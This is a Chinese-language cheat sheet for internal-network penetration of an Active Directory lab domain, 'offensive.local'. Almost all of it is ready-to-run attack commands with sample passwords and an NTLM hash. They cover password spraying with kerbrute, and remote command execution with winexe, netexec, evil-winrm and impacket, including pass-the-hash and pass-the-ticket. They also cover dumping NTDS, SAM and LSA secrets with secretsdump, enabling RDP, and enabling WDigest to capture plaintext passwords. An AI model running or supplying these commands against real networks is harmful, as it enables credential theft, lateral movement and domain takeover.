3.内网渗透
3.1 information
information
在域控机器执行,获取机器名字,系统版本,ip地址
get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address
上面的命令加个导出为csv文件
get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address | Export-Csv c:\temp\AD.csv -encoding utf8
在域控用户的名字,Sid,group
get-ADUser -filter * -properties * | select Name,Sid,DistinguishedName
rustbloud导出域信息
./rusthound -d offensive.local -f DC.offensive.local -u dbadmin -p Admin12345 -z
域内用户和密码喷洒
验证用户存在
kerbrute_windows_amd64.exe userenum --dc 192.168.1.1 -d offensive.local user.txt
喷洒密码
kerbrute_windows_amd64.exe passwordspray --dc 192.168.1.1 -d offensive.local user.txt Admin123453.2 Linux_LateralMovement
1. Winexe
-U 设置用户名和密码参数
Administrator%P@ssw0rd 主机用户名和密码,通过%进行分割
–uninstall 是在退出被控主机时,会自动卸载winexe服务,防止被发现
//127.0.0.1 设置ip地址的格式
command cmd.exe最后为指定运行程序
winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 cmd.exe //返回控制台
winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 "whoami /user"
2. netexec
smb Command(编码)
netexec smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk
smb Command(编码)
cme smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec=gbk
smb Command PTH
netexec smb 192.168.3.110 -u Administrator -H 'ccef208c6485269c20db2cad21734fe7' -x "whoami /user" --codec gbk
smb PowerShell Command
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk -X '$PSVersionTable'
smb exec-method smbexec,wmiexec,mmcexec,atexec
–exec-method {smbexec,wmiexec,mmcexec,atexec}
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method smbexec -x "whoami"
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method mmcexec -x "whoami"
netexec smb 192.168.3.110 -u Administrator -p Admin12345 –exec-method atexec -x “whoami”
winrm Command
netexec winrm 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk
sam dump
netexec winrm 192.168.3.110 -u Administrator -p Admin12345 --sam --codec gbk
smb dump ntds hash
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --codec gbk
smb dump ntds hash log
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --log offensive.log --codec gbk
smb dump ntds hash log(成功率比较低)
netexec smb 192.168.3.110 -u Administrator -p Admin12345 -M ntdsutil --codec gbk
pass-pol
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --pass-pol
brute disks
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --disks
loggedon-users
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --loggedon-users
ldap query
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" ""
ldap query1
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" "sAMAccountName pwdLastSet"
netexec smb -L
└─$ netexec smb -L
LOW PRIVILEGE MODULES
[*] add-computer Adds or deletes a domain computer
[*] dfscoerce Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] enum_av Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_ca Anonymously uses RPC endpoints to hunt for ADCS CAs
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] ms17-010 MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] printerbug Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion.
[*] printnightmare Check if host vulnerable to printnightmare
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a URI to the specified server (default SMB) in all shares with write permissions
[*] spider_plus List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
[*] spooler Detect if print spooler is enabled or not
[*] webdav Checks whether the WebClient service is running on the target
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
netexec smb zerologon
netexec smb 192.168.3.110 -u dbadmin -p Admin12345 -M zerologon
netexec ldap -L
└─$ netexec ldap -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
netexec ldap maq
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 -M maq
netexec ldap whoami
netexec ldap get-network
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M get-network
netexec ldap adcs
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M adcs
netexec ldap trusts
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M enum_trusts
3.evil-winrm
evil-winrm -i 192.168.3.110 -u Administrator -p Admin12345
3.3 impacket
workgroup = ./Administrator
Domain = offensive/Administrator
impacket-secretsdump
DC域控导出域内hash
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
secretsdump.exe -sam sam.hiv -security security.hiv -system system.hiv LOCAL
DC导出域内所有用户hash
reg save HKLM\SYSTEM system.hiv
secretsdump.exe -system system.hiv -ntds ntds.dit LOCAL
secretsdump 查看域内所有用户hash
impacket-secretsdump offensive/Administrator:Admin12345@offensive.local -dc-ip 192.168.3.110
secretsdump 查看域内所有用户hash
impacket-secretsdump -hashes :ccef208c6485269c20db2cad21734fe7 offensive/Administrator@offensive.local -dc-ip 192.168.3.110
secretsdump查看Administrator用户hash
impacket-psexec 票据传递
impacket-getTGT -hashes :ccef208c6485269c20db2cad21734fe7 offensive.local/administrator
export KRB5CCNAME=administrator.ccache
impacket-psexec offensive.local/Administrator@DC.offensive.local -k -no-pass -codec gbk
impacket-psexec 命令执行
impacket-psexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk
impacket-psexec pth命令执行
impacket-psexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk
impacket-wmiexec 命令执行
impacket-wmiexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk
impacket-wmiexec pth命令执行
impacket-wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk
impacket-atexec 命令执行
impacket-atexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk
impacket-smbexec 命令执行
impacket-smbexec offensive/administrator:Admin12345@192.168.3.110 -codec gbk
impacket-smbexec pth命令执行
impacket-smbexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk
impacket-dcomexec 命令执行
impacket-dcomexec offensive/administrator:Admin12345@192.168.3.110 -codec gbk
impacket-dcomexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk
impacket-lookupsid-查看用户sid
impacket-lookupsid -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110
impacket-GetADUsers-查询所有用户
impacket-GetADUsers -all offensive.local/Administrator:Admin12345 -dc-ip 192.168.3.110
impacket-GetADUsers-查询所有计算机
impacket-GetADComputers offensive.local/Administrator:Admin12345 -dc-ip 192.168.3.110
impacket-reg 查看注册表信息
- 查看3389端口
impacket-reg offensive/administrator:Admin12345@192.168.3.173 query -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -v "PortNumber"
- 开启3389
impacket-reg offensive/administrator:Admin12345@192.168.3.173 add -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections -vt REG_DWORD -vd 0
- 开启抓取明文
impacket-reg ./Administrator@192.168.3.173 -hashes ':ccef208c6485269c20db2cad21734fe7' add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -v 'UseLogonCredential' -vt 'REG_DWORD' -vd '1'
impacket报错问题
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839
© 版权声明
THE END
暂无评论内容